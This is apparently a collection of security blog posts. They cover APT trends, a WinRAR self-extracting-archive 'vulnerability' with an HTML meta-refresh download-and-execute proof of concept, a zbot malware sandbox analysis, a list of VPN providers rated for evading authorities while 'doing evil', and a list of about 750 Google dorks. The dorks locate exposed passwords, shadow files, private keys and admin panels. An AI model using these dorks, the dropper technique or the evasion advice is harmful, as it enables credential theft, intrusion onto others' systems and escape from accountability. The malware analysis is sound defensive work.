This is an infography about the evolution of the APT campaigns over the last 5-6 years. It's update until November 2015.
I think it's interesting to realize how APT campaigns are growing high. Complex and hard stop issue...
This is an infography about the evolution of the APT campaigns over the last 5-6 years. It's update until November 2015.
I think it's interesting to realize how APT campaigns are growing high. Complex and hard stop issue...
Post publicado en SecurityArtWork el 5 de Octubre de 2015.
El pasado Martes 29 se hacía público por parte del investigador Mohammad Reza Espargham una "vulnerabilidad" (si, con comillas) de ejecución remota de código en la conocida aplicación Winrar para Windows. En concreto en su explicación se mencionaba que la "vulnerabilidad" estaba presente en la ultima version (5.21) para windows tanto para 32 como para 64 bits.
Como si una bola de nieve se tratase se fue expandiendo la noticia por toda la red y muchas empresas, entidades y sitios web especializados en ciberseguridad, la explicaron como si de una importante vulnerabilidad se tratara. Y no es para menos, podria tratarse de un grave problema si no fuera por una serie características que la limitan.
Unos dias más tarde, en un nota del equipo de soporte de Winrar, hacian saber que muchas de las cosas que se estaban escribiendo eran inciertas y que no consideraban que fuera una vulnerabilidad, sino más bien una característica propia del Winrar.
Pero veamos de que va todo esto. En las primeras noticias leiamos que "La vulnerabilidad puede ser utilizada por un atacante para insertar código HTML dentro de la sección "Text to display", en español "Texto e iconos", cuando un usuario esté creando un fichero SFX.
Un fichero SFX es un fichero ejecutable que contenga uno o mas ficheros comprimidos en su interior. Siguiendo las instrucciones de Mohammed Reza, para conseguirlo habia que descargarse Winrar 5.21 (no lo he probado pero me imagino que el problema exista en versiones anteriores tambien), hacer clic con el boton derecho sobre un fichero y escoger la opcion "Añadir al archivo...", esto nos abre el compresor Winrar.
Una vez abierto, seleccionaremos la opcion "Crear un archivo autoextraible"
...y en la solapa "Avanzado", al hacer clic en el botón "Autoextraible"
...meteremos código HTML similar a este en el campo "Texto a mostrar en la ventana".
Esto nos crea un fichero ejecutable que en su interior contiene un fichero comprimido. En este caso un ebook. El fichero resultante es un fichero ejecutable .EXE con formato SFX, es decir autoextraible.
La vulnerabilidad se basa en que al ejecutar este fichero .EXE, la URL indicada en el codigo HTML antes mencionado se descarga y con la opcion "refresh" se ejecuta. Entonces, si la URL que le hemos puesto es, como en este caso la web de Google, al abrir el fichero SFX nos lo va a mostrar en un navegador integrado que tiene el Winrar:
Es decir, el Winrar trae un navegador incrustado. Tras una serie de pruebas, nos enteramos de que se trata del navegador del sistema:
...entre otras pruebas que le hicimos, con lo que supimos que no es un internet explorer normal y que tiene capado los scripts de javascript.
Pues bien, si somos capaces de mostrar HTML, la idea de Mohammed Reza fue... ¿y descargar un malware?. Pues claro, muy facil. En esta prueba, voy a descargar y ejecutar el putty, de la URL http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe
Por tanto el codigo HTML quedará asi:
<html> <head> <title>poc <META http-equiv="refresh" content="0; URL=http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe"> </head> </html>
Y lo cierto es que lo descarga y lo ejecuta:
...no sin antes avisarnos de que es un .exe... que puede dañar el equipo.
¿Y esto lo podríamos evitar?. Mohammed Reza hizo que el ejecutable estuviera en el propio comprometido y al ejecutar un PHP, creaba un pseudo servidor web, asi que instalamos un servidor HTTP simple en la propia maquina, pusimos una URL local y.... el mismo mensaje.
Lo cierto es que, pensamos, aun así podría ser un problema de seguridad, nunca hay que menospreciar la estupidez humana. A no ser que los sistemas antivirus detecten el fichero ejecutable como malware.
Asi que se le inyectamos la URL del ultimo malware detectado en malc0de database:
y esto fue lo que nos salio en virustotal:
Ningún antivirus detecto que fuera un ejecutable malicioso. Y lo cierto es que no lo es... pero tiene una URL hacia un fichero malicioso. Nada mas.
El problema es que el Winrar lo ejecuta... no sin antes avisarte eso si, de que esto podría afectar a tu ordenador.
Ahora bien, si os acordáis, al principio de todo este rollo, indicaba que era una "vulnerabilidad", con comillas. Desde Winrar se dicho por activa y por pasiva, que no es una vullnerabilidad sino de una feature, una característica. Es (o eso pretende ser) una forma de poder documentar lo que esta comprimido mediante HTML.
Personalmente creo que el HTML sobra, pero lo que esta claro es que Winrar ha dicho que no es una vulnerabilidad, no va a sacar CVE y de hecho no va a haber ni siquiera nueva version capando esta "feature".
Y la verdad es que tienen bastante razón. Para que una persona pueda infectarse a través de un fichero autoextraible de Winrar deben fallar muchas medidas de seguridad:
Es mas, si nos están mandando un fichero ejecutable... y lo vamos a abrir, ¿por que no mandarnos directamente un fichero infectado con malware?. La única diferencia es que Virustotal lo detectará como malicioso y éste no. Se podría considerar a todo este asunto como un "hand-made dropper". Muy facil de crear, muy facil de usar, perfecto para script kiddies y wanabees.
En resumen:
¿Se trata de una vulnerabilidad?. A decir verdad no. El programa Winrar está correctamente escrito. No tiene vulnerbilidades en el código. Se trata pues de un aprovechamiento ilegítimo de una funcionalidad existente y legítima de Winrar.¿Debería haberse montado el revuelo generado?. Desde mi punto de vista es bueno que se haya informado al publico "de a pie" que los ficheros RAR recibidos, sea por el medio que sea, son potencialmente peligrosos. Y que se debe estar alerta.
¿Deberíamos estar preocupados?. Yo creo que no. Parece poco probable que nadie pueda mandarnos un fichero ejecutable por correo, lo abramos y hagamos caso omiso de los avisos.
Para realizar un análisis dinámico de malware es necesario disponer de algunas herramientas preparadas antes de empezar:
Si queremos hacer un análisis más avanzado, tendremos que usar herramientas como:
En esta entrada voy a mostrar un pequeño ejemplo de un análisis dinámico que realicé allá por el año 2012 de una variante del malware zbot.
Inicialmente como vemos, disponemos de una maquina virtual, con el malware ya preparado.
También tenemos preparado el wireshark para analizar el tráfico que salga por la red. Es preferible escuchar en una conexión de red que sólo la vaya a usar nuestra maquina virtual para evitar que el tráfico normal y legitimo de red nos confunda del tráfico causado por el malware.
Para tratar de engañar al malware, se preparó una red falsa con InetSim, aunque se podría haber preparado algo similar con FakeNet
.Una de las tareas importantes a analizar es la captura de las entradas del registro modificadas. Esto se puede conseguir con el Cuckoo Sandbox u otras herramientas. En la siguiente imagen se utilizí CaptureBat.
Utilizando esta misma herramienta se puede ver que se ha creado un ejecutable en la ruta %ApplicationData%/Lyolxi/raruo.exe. Lógicamente es un nombre y una ruta aleatorios.
Entretanto nos dabamos cuenta de que habia tráfico de red causado por este malware:
Como vemos que es tráfico TCP, podemos consultar el stream de datos gracias al Wireshark:
Por ultimo se puede buscar en multiples lugares de internet en busqueda de información extra. En Virustotal, por ejemplo, en este caso, como sabiamos que se trataba de una muestra de Zbot, se buscó en el Zeus Tracker:
Para continuar con el estudio es necesario suspender la máquina virtual y obtener el fichero que contiene la memoria para pasarsela a Volatitlity:
Con Volatility podemos ver muchas cosas, por ejemplo, el listado de procesos REAL en ejecución, con el comando pslist. Digo real porque un malware puede, mediante técnicas de rootkit, esconderse cuando pedimos ver ese listado de procesos.
También podemos ver que hay un proceso que tiene una conexion de internet abierta, el explorer.exe:
Por ultimo, con el comando malfind, podemos buscar si existe código o DLLs inyectadas en memoria de usuario:
El siguiente paso del análisis dinámico consistiría en una análisis del código ensamblado del malware, pero esto es otro nivel que explicaré otro día:
Para un proyecto reciente me solicitaban haber realizado al menos 5 analisis de malware en el pasado. Lo cierto es que han sido muchos más de 5, entre los años 2008 y 2012, pero se realizaron para INTECO-CERT, cuya web ahora ha desaparecido. Por esta razón, voy a recuperar estos análisis realizados y los colgaré en este blog, para que sirvan de muestra en caso de que se me consulte en el futuro.
Estos son solo 8 ejemplos de los más de 500 virus que fueron analizados por mi para el equipo de INTECO-CERT entre 2008 y 2013.
Recientemente se han ido publicado posts mios en diferentes sitios. Algunos con mi nombre. Otros sin él (por motivos de trabajo). Este es el listado de los ultimos 4 meses:
INCIBEEl otro día me interesé en buscar una empresa que me ofreciera un servicio de VPNs que, de ninguna manera, pudiera ser rastreada por las autoridades, saqué un listado bastante completo y me dí cuenta de que todas ellas venden que nunca aportarían sus logs ni aunque recibieran un requerimiento judicial y que, es mas, no almacenaban ningun tipo de información ni sobre los clientes ni sobre sus conexiones. Ambas cosas son inciertas de raíz. Para empezar si se les va apagar tienen que saber qué cliente les va a pagar, información que deben guardar. Bien es cierto que algunas permiten el pago con bitcoins. En cuanto a las IPs de las conexiones, tienen que cumplir la ley. Mas alla de eso no dudo que no almacenen información, pero los datos de conexiones a los que obligan las leyes europeas y americanas ya son suficientes para saber quien es ese cliente. Por tanto, ambas afirmaciones son falsas. Y como leí por ahí, en caso de que el FBI llamara a su puerta, van a acabar ellos en la carcel por tí?. Seguro que no.
Esta web es muy interesante si se necesitan referencias de protección de datos en otros paises (leyes, normas, etc). En dicha web se incluye el siguiente mapa que muestra lo estricta que es la legislación de protección de datos en cada país:
A continuación pongo un listado de proveedores de VPNs de todo el mundo, indicando el país al que pertenecen. Seguro que es un listado infinitamente mejorable, que nadie me pegue por eso. Y basándonos en el mapa anterior, indico los paises de los que me fiaría o no, a la hora de usar VPNs, en caso de querer hacer el mal. Para empezar los de EEUU, de los cuales no me fiaría en absoluto:
HotSpot Shield | Estados Unidos |
Private Internet Access | Estados Unidos |
Tor Guard | Estados Unidos |
IP Vanish | Estados Unidos |
BT Guard | Estados Unidos |
Viking VPN | Estados Unidos |
Anonymizer | Estados Unidos |
HideIP VPN | Estados Unidos |
Slick VPN | Estados Unidos |
Octane VPN | Estados Unidos |
Liquid VPN | Estados Unidos |
UnSpyable VPN | Estados Unidos |
RAM VPN | Estados Unidos |
Ace VPN | Estados Unidos |
VPN Unlimited | Estados Unidos |
Los siguientes pertenecen a paises europeos (y anexos), de los cuales para hacer el mal tampoco me fiaría (excepto quizá de los rumanos) dado que tienen una legislación todos ellos similar a la española:
MullVAD | Suecia |
IPredator | Suecia |
PRQ | Suecia |
FrootVPN | Suecia |
AzireVPN | Suecia |
PrivatVPN | Suecia |
PrivateVPN | Suecia |
AirVPN | Italia |
Free Dome | Finlandia |
IVPN | Gibraltar |
Express VPN | British Virgin Islands |
Steganos | Alemania |
Faceless | Chipre |
VPN.AC | Rumania |
IBVPN | Rumania |
VPN Baron | Rumania |
Cyber Ghost | Rumania |
ShadeYou VPN | Holanda |
Luego tenemos paises afines a EEUU/Europa como:
NordVPN | Panama |
Blacklogic | Canadá |
CryptoStorm | Canadá |
Lokun | Islandia |
NolimitVPN | Singapur |
BlackVPN | Hong Kong |
Iron Socket | Hong Kong |
Perfect Privacy | Nueva Zelanda |
VPN.S | Australia |
Encontré unas cuantas asentadas en las islas Seychelles, de las que no se si me fiaría:
SmartDNS Proxy | Seychelles |
Torrent Privacy | Seychelles |
Proxy.SH | Seychelles |
Astrill | Seychelles |
NextGenVPN | Seychelles |
Y casi de las que mas me fiaría (en caso de estar haciendo el mal) sería de:
Boleh VPN | Malasia |
Hide.me | Malasia |
Seed4.me | Taiwan |
Tiger VPN | Eslovaquia |
Cactus VPN | Moldavia |
SwitchVPN.to | India |
Saludos!
For those who don't know what Google Hacking is you can read a little bit in wikipedia, or have a look at this video. It's not the point of this post to explain what Google dorks and Google hacking are. There many many sites where you can get some google dorks for pentesting. Maybe the best is the exploit-db database.
I want to make my 5-cent contribution to this area so I'll publish a long list of 750 dorks to search interesting information of any kind:
"VNC Desktop" inurl:5800 ext:asa | ext:bak intext:uid intext:pwd -"uid..pwd" database | server | dsn ext:inc "pwd=" "UID=" ext:ini eudora.ini ext:ini Version=4.0.0.4 password ext:passwd -intext:the -sample -example ext:txt inurl:unattend.txt ext:yml database inurl:config ext:asp inurl:pathto.asp ext:ccm ccm -catacomb ext:CDX CDX ext:cgi inurl:editcgi.cgi inurl:file= ext:conf inurl:rsyncd.conf -cvs -man ext:conf NoCatAuth -cvs ext:dat bpk.dat ext:gho gho ext:ics ics ext:ini intext:env.ini ext:jbf jbf ext:ldif ldif ext:log "Software: Microsoft Internet Information Services *.*" ext:mdb inurl:*.mdb inurl:fpdb shop.mdb ext:nsf nsf -gov -mil ext:plist filetype:plist inurl:bookmarks.plist ext:pqi pqi -database ext:reg "username=*" putty ext:txt "Final encryption key" ext:txt inurl:dxdiag ext:vmdk vmdk ext:vmx vmx ext:(doc | pdf | xls | txt | ps | rtf | odt | sxw | psw | ppt | pps | xml) (intext:confidential salary | intext:"budget approved") filetype:bak createobject sa filetype:bak inurl:"htaccess|passwd|shadow|htusers" filetype:cfg mrtg "target filetype:cfm "cfapplication name" password filetype:conf oekakibbs filetype:conf slapd.conf filetype:config config intext:appSettings "User ID" filetype:dat "password.dat" filetype:dat inurl:Sites.dat filetype:dat wand.dat filetype:inc dbconn filetype:inc intext:mysql_connect filetype:inc mysql_connect OR mysql_pconnect filetype:inf sysprep filetype:ini inurl:"serv-u.ini" filetype:ini inurl:flashFXP.ini filetype:ini ServUDaemon filetype:ini wcx_ftp filetype:ini ws_ftp pwd filetype:ldb admin filetype:log "See `ipsec -copyright" filetype:log inurl:"password.log" filetype:mdb inurl:users.mdb filetype:mdb wwforum filetype:netrc password filetype:pass pass intext:userid filetype:pem intext:private filetype:properties inurl:db intext:password filetype:pwd service filetype:pwl pwl filetype:reg reg +intext:"defaultusername" +intext:"defaultpassword" filetype:reg reg +intext:â? WINVNC3â? filetype:reg reg HKEY_CURRENT_USER SSHHOSTKEYS filetype:sql "insert into" (pass|passwd|password) filetype:sql ("values * MD5″ | "values * password" | "values * encrypt") filetype:sql +"IDENTIFIED BY" -cvs filetype:sql password filetype:url +inurl:"ftp://" +inurl:";@" filetype:xls username password email filetype:asp DBQ=" * Server.MapPath("*.mdb") filetype:bkf bkf filetype:blt "buddylist" filetype:blt blt +intext:screenname filetype:cfg auto_inst.cfg filetype:cnf inurl:_vti_pvt access.cnf filetype:conf inurl:firewall -intitle:cvs filetype:config web.config -CVS filetype:ctt Contact filetype:ctt ctt messenger filetype:eml eml +intext:"Subject" +intext:"From" +intext:"To" filetype:fp3 fp3 filetype:fp5 fp5 -site:gov -site:mil -"cvs log" filetype:fp7 fp7 filetype:inf inurl:capolicy.inf filetype:lic lic intext:key filetype:log access.log -CVS filetype:log cron.log filetype:mbx mbx intext:Subject filetype:myd myd -CVS filetype:ns1 ns1 filetype:ora ora filetype:ora tnsnames filetype:pdb pdb backup (Pilot | Pluckerdb) filetype:php inurl:index inurl:phpicalendar -site:sourceforge.net filetype:pot inurl:john.pot filetype:PS ps filetype:pst inurl:"outlook.pst" filetype:pst pst -from -to -date filetype:qbb qbb filetype:QBW qbw filetype:rdp rdp filetype:reg "Terminal Server Client" filetype:vcs vcs filetype:wab wab filetype:xls -site:gov inurl:contact filetype:xls inurl:"email.xls" filetype:pdf "Assessment Report" nessus filetype:php inurl:ipinfo.php "Distributed Intrusion Detection System" filetype:php inurl:nqt intext:"Network Query Tool" filetype:vsd vsd network -samples -examples filetype:asp + "[ODBC SQL" filetype:asp "Custom Error Message" Category Source filetype:log "PHP Parse error" | "PHP Warning" | "PHP Error" filetype:php inurl:"logging.php" "Discuz" error htpasswd htpasswd / htgroup htpasswd / htpasswd.bak intext:"enable password 7″ intext:"enable secret 5 $" intext:"EZGuestbook" intext:"Web Wiz Journal" intext:""BiTBOARD v2.0″ BiTSHiFTERS Bulletin Board" intext:"Fill out the form below completely to change your password and user name. If new username is left blank, your old one will be assumed." -edu intext:"Mail admins login here to administrate your domain." intext:"Master Account" "Domain Name" "Password" inurl:/cgi-bin/qmailadmin intext:"Master Account" "Domain Name" "Password" inurl:/cgi-bin/qmailadmin intext:"Storage Management Server for" intitle:"Server Administration" intext:"Welcome to" inurl:"cp" intitle:"H-SPHERE" inurl:"begin.html" -Fee intext:"vbulletin" inurl:admincp intext:"Session Start * * * *:*:* *" filetype:log intext:"Tobias Oetiker" "traffic analysis" intext:(password | passcode) intext:(username | userid | user) filetype:csv intext:gmail invite intext:http://gmail.google.com/gmail/a intext:SQLiteManager inurl:main.php intext:ViewCVS inurl:Settings.php intitle:"admin panel" +" intitle:"index of" intext:connect.inc intitle:"index of" intext:globals.inc intitle:"Index of" passwords modified intitle:"Index of" sc_serv.conf sc_serv content intitle:"phpinfo()" +"mysql.default_password" +"Zend s?ri?ting Language Engine" intitle:dupics inurl:(add.asp | default.asp | view.asp | voting.asp) -site:duware.com intitle:index.of administrators.pwd intitle:Index.of etc shadow intitle:index.of intext:"secring.skr"|"secring.pgp"|"secring.bak" intitle:rapidshare intext:login intitle:"remote assessment" OpenAanval Console intitle:opengroupware.org "resistance is obsolete" "Report Bugs" "Username" "password" intitle:"Admin Login" "admin login" "blogware" intitle:"Admin login" "Web Site Administration" "Copyright" intitle:"AlternC Desktop" intitle:"Athens Authentication Point" intitle:"b2evo > Login form" "Login form. You must log in! You will have to accept cookies in order to log in" -demo -site:b2evolution.net intitle:"Cisco CallManager User Options Log On" "Please enter your User ID and Password in the spaces provided below and click the Log On button to co intitle:"ColdFusion Administrator Login" intitle:"communigate pro * *" intitle:"entrance" intitle:"Content Management System" "user name"|"password"|"admin" "Microsoft IE 5.5″ -mambo intitle:"Content Management System" "user name"|"password"|"admin" "Microsoft IE 5.5″ -mambo intitle:"Dell Remote Access Controller" intitle:"Docutek ERes - Admin Login" -edu intitle:"Employee Intranet Login" intitle:"eMule *" intitle:"- Web Control Panel" intext:"Web Control Panel" "Enter your password here." intitle:"ePowerSwitch Login" intitle:"eXist Database Administration" -demo intitle:"EXTRANET * - Identification" intitle:"EXTRANET login" -.edu -.mil -.gov intitle:"EZPartner" -netpond intitle:"Flash Operator Panel" -ext:php -wiki -cms -inurl:asternic -inurl:sip -intitle:ANNOUNCE -inurl:lists intitle:"i-secure v1.1″ -edu intitle:"Icecast Administration Admin Page" intitle:"iDevAffiliate - admin" -demo intitle:"ISPMan : Unauthorized Access prohibited" intitle:"ITS System Information" "Please log on to the SAP System" intitle:"Kurant Corporation StoreSense" filetype:bok intitle:"ListMail Login" admin -demo intitle:"Login - Easy File Sharing Web Server" intitle:"Login Forum AnyBoard" intitle:"If you are a new user:" intext:"Forum AnyBoard" inurl:gochat -edu intitle:"Login to @Mail" (ext:pl | inurl:"index") -dwaffleman intitle:"Login to Cacti" intitle:"Login to the forums - @www.aimoo.com" inurl:login.cfm?id= intitle:"MailMan Login" intitle:"Member Login" "NOTE: Your browser must have cookies enabled in order to log into the site." ext:php OR ext:cgi intitle:"Merak Mail Server Web Administration" -ihackstuff.com intitle:"microsoft certificate services" inurl:certsrv intitle:"MikroTik RouterOS Managing Webpage" intitle:"MX Control Console" "If you can't remember" intitle:"Novell Web Services" "GroupWise" -inurl:"doc/11924″ -.mil -.edu -.gov -filetype:pdf intitle:"Novell Web Services" intext:"Select a service and a language." intitle:"oMail-admin Administration - Login" -inurl:omnis.ch intitle:"OnLine Recruitment Program - Login" intitle:"Philex 0.2*" -s?ri?t -site:freelists.org intitle:"PHP Advanced Transfer" inurl:"login.php" intitle:"php icalendar administration" -site:sourceforge.net intitle:"php icalendar administration" -site:sourceforge.net intitle:"phpPgAdmin - Login" Language intitle:"PHProjekt - login" login password intitle:"please login" "your password is *" intitle:"Remote Desktop Web Connection" inurl:tsweb intitle:"SFXAdmin - sfx_global" | intitle:"SFXAdmin - sfx_local" | intitle:"SFXAdmin - sfx_test" intitle:"SHOUTcast Administrator" inurl:admin.cgi intitle:"site administration: please log in" "site designed by emarketsouth" intitle:"Supero Doctor III" -inurl:supermicro intitle:"SuSE Linux Openexchange Server" "Please activate Javas?ri?t!" intitle:"teamspeak server-administration intitle:"Tomcat Server Administration" intitle:"TOPdesk ApplicationServer" intitle:"TUTOS Login" intitle:"TWIG Login" intitle:"vhost" intext:"vHost . 2000-2004″ intitle:"Virtual Server Administration System" intitle:"VisNetic WebMail" inurl:"/mail/" intitle:"VitalQIP IP Management System" intitle:"VMware Management Interface:" inurl:"vmware/en/" intitle:"VNC viewer for Java" intitle:"web-cyradm"|"by Luc de Louw" "This is only for authorized users" -tar.gz -site:web-cyradm.org intitle:"WebLogic Server" intitle:"Console Login" inurl:console intitle:"Welcome Site/User Administrator" "Please select the language" -demos intitle:"Welcome to Mailtraq WebMail" intitle:"welcome to netware *" -site:novell.com intitle:"WorldClient" intext:"? (2003|2004) Alt-N Technologies." intitle:"xams 0.0.0..15 - Login" intitle:"XcAuctionLite" | "DRIVEN BY XCENT" Lite inurl:admin intitle:"XMail Web Administration Interface" intext:Login intext:password intitle:"Zope Help System" inurl:HelpSys intitle:"ZyXEL Prestige Router" "Enter password" intitle:"inc. vpn 3000 concentrator" intitle:("TrackerCam Live Video")|("TrackerCam Application Login")|("Trackercam Remote") -trackercam.com intitle:asterisk.management.portal web-access intitle:endymion.sak?.mail.login.page | inurl:sake.servlet intitle:Group-Office "Enter your username and password to login" intitle:ilohamail " IlohaMail" intitle:ilohamail intext:"Version 0.8.10″ " IlohaMail" intitle:IMP inurl:imp/index.php3 intitle:Login * Webmailer intitle:Login intext:"RT is ? Copyright" intitle:Node.List Win32.Version.3.11 intitle:Novell intitle:WebAccess "Copyright *-* Novell, Inc" intitle:open-xchange inurl:login.pl intitle:Ovislink inurl:private/login intitle:phpnews.login intitle:plesk inurl:login.php3 intitle:"Apache::Status" (inurl:server-status | inurl:status.html | inurl:apache.html) intitle:"AppServ Open Project" -site:www.appservnetwork.com intitle:"ASP Stats Generator *.*" "ASP Stats Generator" "2003-2004 weppos" intitle:"Big Sister" +"OK Attention Trouble" intitle:"curriculum vitae" filetype:doc intitle:"edna:streaming mp3 server" -forums intitle:"FTP root at" intitle:"index of" +myd size intitle:"Index Of" -inurl:maillog maillog size intitle:"Index Of" cookies.txt size intitle:"index of" mysql.conf OR mysql_config intitle:"Index of" upload size parent directory intitle:"index.of *" admin news.asp configview.asp intitle:"index.of" .diz .nfo last modified intitle:"Joomla - Web Installer" intitle:"LOGREP - Log file reporting system" -site:itefix.no intitle:"Multimon UPS status page" intitle:"PHP Advanced Transfer" (inurl:index.php | inurl:showrecent.php ) intitle:"PhpMyExplorer" inurl:"index.php" -cvs intitle:"statistics of" "advanced web statistics" intitle:"System Statistics" +"System and Network Information Center" intitle:"urchin (5|3|admin)" ext:cgi intitle:"Usage Statistics for" "Generated by Webalizer" intitle:"wbem" compaq login "Compaq Information Technologies Group" intitle:"Web Server Statistics for ****" intitle:"web server status" SSH Telnet intitle:"Welcome to F-Secure Policy Manager Server Welcome Page" intitle:"welcome.to.squeezebox" intitle:admin intitle:login intitle:Bookmarks inurl:bookmarks.html "Bookmarks intitle:index.of "Apache" "server at" intitle:index.of cleanup.log intitle:index.of dead.letter intitle:index.of inbox intitle:index.of inbox dbx intitle:index.of ws_ftp.ini intitle:intranet inurl:intranet +intext:"phone" intitle:"ADSL Configuration page" intitle:"Azureus : Java BitTorrent Client Tracker" intitle:"Belarc Advisor Current Profile" intext:"Click here for Belarc's PC Management products, for large and small companies." intitle:"BNBT Tracker Info" intitle:"Microsoft Site Server Analysis" intitle:"Nessus Scan Report" "This file was generated by Nessus" intitle:"PHPBTTracker Statistics" | intitle:"PHPBT Tracker Statistics" intitle:"Retina Report" "CONFIDENTIAL INFORMATION" intitle:"start.managing.the.device" remote pbx acc intitle:"sysinfo * " intext:"Generated by Sysinfo * written by The Gamblers." intitle:"twiki" inurl:"TWikiUsers" intitle:"Gateway Configuration Menu" intitle:"Horde :: My Portal" -"[Tickets" intitle:"Mail Server CMailServer Webmail" "5.2″ intitle:"MvBlog powered" intitle:"Remote Desktop Web Connection" intitle:"Samba Web Administration Tool" intext:"Help Workgroup" intitle:"Terminal Services Web Connection" intitle:"Uploader - Uploader v6″ -pixloads.com intitle:osCommerce inurl:admin intext:"redistributable under the GNU" intext:"Online Catalog" -demo -site:oscommerce.com intitle:phpMyAdmin "Welcome to phpMyAdmin ***" "running on * as root@*" intitle:phpMyAdmin "Welcome to phpMyAdmin ***" "running on * as root@*" intitle:"Apache Tomcat" "Error Report" intitle:"Default PLESK Page" intitle:"Error Occurred While Processing Request" +WHERE (SELECT|INSERT) filetype:cfm intitle:"Error Occurred" "The error occurred in" filetype:cfm intitle:"Error using Hypernews" "Server Software" intitle:"Execution of this s?ri?t not permitted" intitle:"Under construction" "does not currently have" intitle:Configuration.File inurl:softcart.exe inurl:"calendars?ri?t/users.txt" inurl:"editor/list.asp" | inurl:"database_editor.asp" | inurl:"login.asa" "are set" inurl:"GRC.DAT" intext:"password" inurl:"Sites.dat"+"PASS=" inurl:"slapd.conf" intext:"credentials" -manpage -"Manual Page" -man: -sample inurl:"slapd.conf" intext:"rootpw" -manpage -"Manual Page" -man: -sample inurl:"wvdial.conf" intext:"password" inurl:/db/main.mdb inurl:/wwwboard inurl:/yabb/Members/Admin.dat inurl:ccbill filetype:log inurl:cgi-bin inurl:calendar.cfg inurl:chap-secrets -cvs inurl:config.php dbuname dbpass inurl:filezilla.xml -cvs inurl:lilo.conf filetype:conf password -tatercounter2000 -bootpwd -man inurl:nuke filetype:sql inurl:ospfd.conf intext:password -sample -test -tutorial -download inurl:pap-secrets -cvs inurl:pass.dat inurl:perform filetype:ini inurl:perform.ini filetype:ini inurl:secring ext:skr | ext:pgp | ext:bak inurl:server.cfg rcon password inurl:ventrilo_srv.ini adminpassword inurl:vtund.conf intext:pass -cvs inurl:zebra.conf intext:password -sample -test -tutorial -download inurl:"/admin/configuration. php?" Mystore inurl:"/slxweb.dll/external?name=(custportal|webticketcust)" inurl:"1220/parse_xml.cgi?" inurl:"631/admin" (inurl:"op=*") | (intitle:CUPS) inurl:":10000″ intext:webmin inurl:"Activex/default.htm" "Demo" inurl:"calendar.asp?action=login" inurl:"default/login.php" intitle:"kerio" inurl:"gs/adminlogin.aspx" inurl:"php121login.php" inurl:"suse/login.pl" inurl:"typo3/index.php?u=" -demo inurl:"usysinfo?login=true" inurl:"utilities/TreeView.asp" inurl:"vsadmin/login" | inurl:"vsadmin/admin" inurl:.php|.asp inurl:/admin/login.asp inurl:/cgi-bin/sqwebmail?noframes=1 inurl:/Citrix/Nfuse17/ inurl:/dana-na/auth/welcome.html inurl:/eprise/ inurl:/Merchant2/admin.mv | inurl:/Merchant2/admin.mvc | intitle:"Miva Merchant Administration Login" -inurl:cheap-malboro.net inurl:/modcp/ intext:Moderator+vBulletin inurl:/SUSAdmin intitle:"Microsoft Software upd?t? Services" inurl:/webedit.* intext:WebEdit Professional -html inurl:1810 "Oracle Enterprise Manager" inurl:2000 intitle:RemotelyAnywhere -site:realvnc.com inurl::2082/frontend -demo inurl:administrator "welcome to mambo" inurl:bin.welcome.sh | inurl:bin.welcome.bat | intitle:eHealth.5.0 inurl:cgi-bin/ultimatebb.cgi?ubb=login inurl:Citrix/MetaFrame/default/default.aspx inurl:confixx inurl:login|anmeldung inurl:coranto.cgi intitle:Login (Authorized Users Only) inurl:csCreatePro.cgi inurl:default.asp intitle:"WebCommander" inurl:exchweb/bin/auth/owalogon.asp inurl:gnatsweb.pl inurl:ids5web inurl:irc filetype:cgi cgi:irc inurl:login filetype:swf swf inurl:login.asp inurl:login.cfm inurl:login.php "SquirrelMail version" inurl:metaframexp/default/login.asp | intitle:"Metaframe XP Login" inurl:mewebmail inurl:names.nsf?opendatabase inurl:ocw_login_username inurl:orasso.wwsso_app_admin.ls_login inurl:postfixadmin intitle:"postfix admin" ext:php inurl:search/admin.php inurl:textpattern/index.php inurl:WCP_USER inurl:webmail./index.pl "Interface" inurl:webvpn.html "login" "Please enter your" inurl:"/axs/ax-admin.pl" -s?ri?t inurl:"/cricket/grapher.cgi" inurl:"bookmark.htm" inurl:"cacti" +inurl:"graph_view.php" +"Settings Tree View" -cvs -RPM inurl:"newsletter/admin/" inurl:"newsletter/admin/" intitle:"newsletter admin" inurl:"putty.reg" inurl:"smb.conf" intext:"workgroup" filetype:conf conf inurl:*db filetype:mdb inurl:/cgi-bin/pass.txt inurl:/_layouts/settings inurl:admin filetype:xls inurl:admin intitle:login inurl:backup filetype:mdb inurl:build.err inurl:cgi-bin/printenv inurl:cgi-bin/testcgi.exe "Please distribute TestCGI" inurl:changepassword.asp inurl:ds.py inurl:email filetype:mdb inurl:fcgi-bin/echo inurl:forum filetype:mdb inurl:forward filetype:forward -cvs inurl:getmsg.html intitle:hotmail inurl:log.nsf -gov inurl:main.php phpMyAdmin inurl:main.php Welcome to phpMyAdmin inurl:netscape.hst inurl:netscape.hst inurl:netscape.ini inurl:odbc.ini ext:ini -cvs inurl:perl/printenv inurl:php.ini filetype:ini inurl:preferences.ini "[emule]" inurl:profiles filetype:mdb inurl:report "EVEREST Home Edition " inurl:server-info "Apache Server Information" inurl:server-status "apache" inurl:snitz_forums_2000.mdb inurl:ssl.conf filetype:conf inurl:tdbin inurl:vbstats.php "page generated" inurl:wp-mail.php + "There doesn't seem to be any new mail." inurl:XcCDONTS.asp inurl:"/catalog.nsf" intitle:catalog inurl:"install/install.php" inurl:"map.asp?" intitle:"WhatsUp Gold" inurl:"NmConsole/Login.asp" | intitle:"Login - Ipswitch WhatsUp Professional 2005″ | intext:"Ipswitch WhatsUp Professional 2005 (SP1)" "Ipswitch, Inc" inurl:"sitescope.html" intitle:"sitescope" intext:"refresh" -demo inurl:/adm-cfgedit.php inurl:/cgi-bin/finger? "In real life" inurl:/cgi-bin/finger? Enter (account|host|user|username) inurl:/counter/index.php intitle:"+PHPCounter 7.*" inurl:CrazyWWWBoard.cgi intext:"detailed debugging information" inurl:login.jsp.bak inurl:ovcgi/jovw inurl:phpSysInfo/ "created by phpsysinfo" inurl:portscan.php "from Port"|"Port Range" inurl:proxy | inurl:wpad ext:pac | ext:dat findproxyforurl inurl:statrep.nsf -gov inurl:status.cgi?host=all inurl:testcgi xitami inurl:webalizer filetype:png -.gov -.edu -.mil -opendarwin inurl:webutil.pl inurl:"/NSearch/AdminServlet" inurl:"index.php? module=ew_filemanager" inurl:aol*/_do/rss_popup?blogID= inurl:footer.inc.php inurl:info.inc.php inurl:ManyServers.htm inurl:newsdesk.cgi? inurl:"t=" inurl:pls/admin_/gateway.htm inurl:rpSys.html inurl:search.php vbulletin inurl:servlet/webacc inurl:htpasswd filetype:htpasswd 